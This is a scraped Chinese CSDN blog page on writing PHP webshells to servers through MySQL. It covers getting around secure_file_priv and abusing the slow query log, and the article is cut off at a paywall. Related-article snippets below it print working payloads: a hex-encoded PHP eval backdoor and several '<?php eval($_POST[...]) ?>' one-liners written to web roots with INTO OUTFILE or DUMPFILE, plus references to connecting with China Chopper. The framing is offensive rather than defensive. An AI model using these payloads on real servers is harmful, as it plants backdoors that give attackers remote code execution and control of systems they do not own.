linux mysql webshell_通过MySQL写入webshell的几种方式

最新推荐文章于 2024-04-02 14:17:25 发布
最新推荐文章于 2024-04-02 14:17:25 发布
阅读量344 收藏
点赞数
文章标签: linux mysql webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39785723/article/details/113464163
版权

在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:

1、NULL:表示不允许导入导出

3、空,即没有具体值:表示不对导入导出做限制

可使用如下命令来查看secure_file_priv的值:

show global variables like '%secure%';

f9f0fb6454f099e51e71344ace79c1a4.png

高版本的mysql中默认为NULL,也就是不让导入导出

解决办法

在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=

在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_priv=

使用慢查询日志绕过此限制

利用条件:

1、root权限

2、网站的绝对路径且具有写入权限

执行如下语句写入shell:

查看慢查询日志开启情况show variables like '%slow_query_log%';开启慢查询日志set global slow_query_log=1;修改日志文件存储的绝对路径set global slow_query_log_file='E:/phpS

最低0.47元/天 解锁文章
weixin_39785723
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
mysqlshell
baidu_39504221的博客
12-18 600
一般前提: 有权限,有绝对路径 一般写文件 select 0x3c3f70687020406576616c28245f504f53545b2774657374275d293f3e into outfile'D:\\phpstudy_pro\\WWW\\shell.php'; 以sqli-labs第七关为例 虽然这里报错了,但是文件还是写进去了 后面就可以用菜刀连接了 ...
利用mysqlwebshell_【教程】利用MySQLwebshell
weixin_39612038的博客
01-19 293
利用MySQLwebshell前提:在知道数据库地址、数据库用户名、密码的情况下(先在本地的数据库验证一下想法的可行性)1.打开任意数据库并创建一个表create TABLE a (cmd text NOT NULL);2.插入一句话木马insert INTO a (cmd) VALUES('');3.导出一句话木马 (通过phpinfo发现绝对路径)select cmd from a into...
通过mysql语句拿shell_利用shell脚本运行MYSQL语句,并在mysql中执行shell脚本
weixin_34450486的博客
01-19 366
1,先手动测试shelllinux下面利用shell脚本运行MySQL语句,并在mysql中执行shell脚本shell脚本:(将最新产生的MYSQL错误日志导到数据表中)bin/mysql -u root -p11111 <use MysqlCenter;create TEMPORARY table Errlog_info_temp(loginfo varchar(2000),id int...
Mysql数据库getshell方法
weixin_68408599的博客
04-02 1472
今天摸鱼时候,突然有人问我不同的数据库getshell方式,一时间我想到了mysql还有redis未授权访问到getshell方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell方式。因此更新一个专栏,各个数据库getshell方式
第01篇:MySQL注入点写WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
MySQL注入是一种常见的安全漏洞,允许攻击者通过构造恶意SQL语句来操纵数据库。在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中...
网站拿webshell_经典全集.doc
10-17
即使上传漏洞已经被修补,攻击者仍然可以尝试通过后台管理功能来写入WebShell。例如,在Dvbbs6.0和Leadbbs2.88等系统中,可以直接在后台修改配置文件,插入带有`.asp`后缀的文件。此外,Leadbbs3.14提供了一种独特的...
利用mysqlwebshell_mysqlwebshell总结
weixin_36121198的博客
02-05 138
php eval($_POST[jumbo])?>‘ into outfile ‘/var/www/jumbo.php‘;2、select ‘‘ into dumpfile ‘/var/www/jumbo.php‘;3、Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) V...
mysql数据库拿shell_mysql数据库怎么转到shell>
weixin_28881575的博客
01-19 169
展开全部本文介绍 MySQL 8.0 shell 子模块32313133353236313431303231363533e78988e69d8331333433626538 Util 的两个导入特性 importTable/import_table(JS和python 版本的命名差异)、importJson/import_json的使用方法。其中 import_table 是通过传统 MySQL ...
shell脚本读取csv_shell脚本连接、读写、操作mysql数据库实例
weixin_39984578的博客
12-20 514
本文介绍了如何在shell中读写mysql数据库。主要介绍了如何在shell 中连接mysql数据库,如何在shell中创建数据库,创建表,插入csv文件,读取mysql数据库,导出mysql数据库为xml或html文件, 并分析了核心语句。本文介绍的方法适用于PostgreSQL ,相对mysql而言,shell 中读写PostgreSQL会更简单些。1. 连接mysql 数据库shell中连接...
mysql数据库拿shell_利用数据库拿shell的一些姿势
weixin_34569317的博客
01-26 2137
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
提权学习 -- 使用 mysql 拿到 webshell
LuckyToMeet-Dian叶
06-14 856
注意 如造成一切损失,与本人无关! 工具准备 scanPort 端口扫描工具,用于扫描内网中开放的端口。 dirBuster 网站目录扫描工具,用于扫描网站的目录已经 URL,暴力破解方式,可能会把服务器弄崩(电脑不咋地的情况)。 提权前提 对方需要开启服务器,且需要知道服务器在宿主机上的绝对路径 知道其 mysql 用户名和密码 mysql 有读写权限,可以向服务器开放目录写木马文件。 有上...
mysqlwebshell总结
weixin_33795833的博客
10-24 230
1、select '<?php eval($_POST[jumbo]) ?>' into outfile '/var/www/jumbo.php'; 2、select '<?php eval($_POST[jumbo]) ?>' into dumpfile '/var/www/jumbo.php'; 3、Drop TABLE IF EXISTS temp;Creat...
深入理解MySQL安全(二)-数据库权限和webshell
zhujiu_fu的博客
02-13 172
本文深入浅出的讲解了数据库权限对数据库安全的作用及获取webshell的方法和思路,最后阐述了如何才能获取一个稳定的shell的方法和思路。
php 写入文件 ctf,CTF PHP代码审计中file_put_contents函数利用
weixin_31001855的博客
03-10 2012
源码分析function is_valid($title, $data){$data = $title . $data;return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data);}function write_cache($title, $content){$dir = changedir(CACHE_DIR . get_username() . '/'...
mysql—注入点获取WebShell几种方式
Thunderclap的博客
11-16 4872
利用条件 1.有写文件条件 secure-file-priv(show variables) 要么禁用,要么设置了路径 show variables like '%secure%' 目录权限 对于MySQL来说,有可以对某个目录进行读写的权限 Selinux 是2.6版本的Linux内核中提供的强制访问控制(MAC)系统 2.知道绝对路径 3.PHP的GPC为 off状态,或者在开启gpc的情况下,可以通过十六进制的路径读写文件 4.查看当前数据库用户是否有File权限 select
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
MySQL注入点写入WebShell几种方式
qq_45521281的博客
05-27 1585
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。 比如:当面对一个MySQL注入点,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。 接下来,本文将通过构造一个注入点,分享几种Webshell写入的技巧。 0x01 构造一个注入点 1、在默认数据库test中创建测试表admin和测
webshell common_webshell_connection
最新发布
05-30
webshell是一种常用的攻击手段,它通过在受害者的服务器上安装一个webshell,实现对受害者服务器的控制。而common_webshell_connection则是指在webshell连接中常见的一些命令、参数、及其含义,包括但不限于: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值